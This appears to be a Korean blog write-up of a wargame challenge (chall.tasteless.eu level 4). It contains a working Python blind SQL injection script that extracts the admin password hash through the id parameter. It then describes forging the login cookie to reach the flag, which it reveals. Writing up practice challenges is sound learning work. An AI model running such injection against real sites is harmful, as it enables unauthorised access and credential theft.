로그인 후 id 파라미터에서 SQLI가 터지는데 union이 안된다. 블라인드로 어드민 계정의 패스워드를 구해주면 아래와 같은 32자리 md값이 나온다.
import requests
def request(payload):
url = "http://chall.tasteless.eu/level4/index.php"
params = {'action':'pm','id':payload}
headers = {'Cookie':'login=guest%25084e0343a0486ff05530df6c705c8bb4; __cfduid=dc8f9c4e92cf4316e617bbaa23cfc8b8f1532166053; PHPSESSID=dnn3sve7g1th9sh0164soi6ck6'}
response = requests.get(url,params=params,headers=headers).text
if "Welcome" in response:
return True
else:
return False
length = 0
for i in range(0,100):
payload = "1 and length((select pass from level4 where username=0x61646d696e limit 0,1))="+str(i)+"#"
if request(payload) == True:
length = i
print "Find Admin Pw Length[*] = " + str(length)
break
binary = ""
admin_pw = ""
for i in range(1,length+1):
binary = ""
for j in range(1,9):
payload = "1 and substring(lpad(bin(ascii(substring((select pass from level4 where username=0x61646d696e limit 0,1),"+str(i)+",1))),8,0),"+str(j)+",1)#"
if request(payload) == True:
binary += "1"
else:
binary += "0"
if binary !="00000000":
admin_pw += chr(int(binary,2))
print "Find Admin Pw[-] = " + admin_pw
print "Find Admin Pw[+] = " + admin_pw
이걸 로그인 후 할당받는 쿠키 값 중 login=guest%25084e0343a0486ff05530df6c705c8bb4 요렇게 된 부분에 admin%2598aa0ec014a46e34571affaf88999ebb 요런식으로 넣어주면 플래그가 나온다.
Flag = D0nt_Yu0_LOv3_co0kies
'Wargame > chall.tasteless.eu' 카테고리의 다른 글
| chall.tasteless.eu Level 7 Get Me Down (0) | 2018.10.14 |
|---|---|
| chall.tasteless.eu Level 6 Too Easy (0) | 2018.10.14 |
| chall.tasteless.eu Level 3 Double Agent (0) | 2018.10.14 |
| chall.tasteless.eu Level 1 Infiltration (0) | 2018.10.13 |
| chall.tasteless.eu Level 2 Milk (0) | 2018.10.13 |
JeonYoungSin
메모 기록용 공간